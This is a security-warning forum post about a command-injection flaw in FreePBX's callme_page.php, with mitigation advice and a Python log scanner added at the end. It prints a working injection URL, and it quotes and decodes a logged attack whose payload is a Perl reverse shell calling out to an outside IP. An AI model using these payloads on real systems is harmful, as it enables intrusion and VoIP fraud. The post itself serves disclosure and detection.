Hi,
Just thought I'd let you all know of a security concern with FreePBX. For those of you who make the conscious decision to run FreePBX and leave the web interface on a public IP address, I'd strongly recommend that you at the very least remove the /recordings interface.
We had a customer's VPS server compromised, and running through some logs we noticed a very worrying issue.
It appears the /recordings/misc/callme_page.php has a very serious sanitisation error.
What does that mean for me? What it means is that someone with bad intentions can execute code as if they are the root user of the system and potentially gain access to your system.
How do I prevent this? Ideally the answer to this question would be to refrain from using FreePBX, but in practice that's not always possible. I would suggest putting at the very least the web interface behind a firewall/ACL.
So what does the hack look like? Like so:
Code:
http://myfreepbx-ip/recordings/misc/callme_page.php?action=c&callmenum=1001@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20echo%20fucked%20>%20/var/www/html/recordings/misc/lol%0D%0A%0D%0A
All it's going to do is create a file in your recordings folder, but nonetheless the plausibility is there for it to be used to compromise a full system. Once in, they could easily gain access to MySQL and wreak havoc.
If you're running CentOS like us, I'd suggest running the following command:
Code:
cat /var/log/httpd/access_log* | grep recordings
If you start to see anything with a very long URL after the callmenum querystring parameter then it's possible your box may be compromised as well.
Quote:
[root@voip02(/)> cat /var/log/httpd/access_log* | grep recordings
213.142.137.231 - - [25/Mar/2012:08:54:19 +0100] "GET /recordings/misc/callme_page.php?action=c&callmenum=1000@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22178.63.10.87%3a53%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A HTTP/1.0" 200 947 "-" "Python-urllib/1.17"
This translates to the following command being issued to asterisk:
Code:
/recordings/misc/callme_page.php?action=c&callmenum=1000@from-internal/n
Application: system
Data: perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"178.63.10.87:53");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
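As an added example (not part of Dean's post or of FreePBX), a small Python script that does what the grep above does but more precisely: it parses Apache access_log lines, decodes the callmenum parameter and flags requests where the value carries CRLF-injected Asterisk headers like the log line above. The log lines inside it are constructed, and the 198.51.100.7 address is a placeholder.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access_log lines (not real traffic). The second one has a
# CRLF-injected callmenum of the same shape as the hit quoted in the post.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Mar/2012:08:50:01 +0100] "GET /recordings/misc/callme_page.php?action=c&callmenum=1001@from-internal HTTP/1.1" 200 947 "-" "Mozilla/5.0"
198.51.100.7 - - [25/Mar/2012:08:54:19 +0100] "GET /recordings/misc/callme_page.php?action=c&callmenum=1000@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20echo%20test%0D%0A%0D%0A HTTP/1.0" 200 947 "-" "Python-urllib/1.17"
10.0.0.8 - - [25/Mar/2012:09:01:00 +0100] "GET /admin/config.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
"""

# Apache combined/common log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A legitimate callmenum is an extension with an optional dialplan context,
# e.g. 1001@from-internal. Anything else deserves a look.
CALLMENUM_OK = re.compile(r'^[0-9*#+]+(@[A-Za-z0-9_-]+)?$')


def find_callme_injections(log_text):
    """Return one dict per suspicious callme_page.php request in log_text."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or '/recordings/' not in m.group('target'):
            continue
        # parse_qs percent-decodes, so %0D%0A becomes a real CR LF pair here.
        qs = parse_qs(urlsplit(m.group('target')).query, keep_blank_values=True)
        for value in qs.get('callmenum', []):
            if CALLMENUM_OK.match(value):
                continue
            reasons = []
            if '\r' in value or '\n' in value:
                reasons.append('CRLF in callmenum')
            # Injected Originate-style headers that Asterisk would act on.
            if re.search(r'(?im)^application\s*:', value):
                reasons.append('Application header injected')
            if re.search(r'(?im)^data\s*:', value):
                reasons.append('Data header injected')
            hits.append({'ip': m.group('ip'), 'ts': m.group('ts'),
                         'callmenum': value,
                         'reasons': reasons or ['unexpected callmenum format']})
    return hits


if __name__ == '__main__':
    for h in find_callme_injections(SAMPLE_LOG):
        print(h['ts'], h['ip'], ', '.join(h['reasons']), repr(h['callmenum']))
```

To run it over a real box, replace SAMPLE_LOG with the contents of /var/log/httpd/access_log* and review every hit, not just the ones with a long URL.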
Fingers crossed this will prevent at least one person from falling victim to these bastards and getting duped out of a lot of VoIP Credit.
Regards
Dean.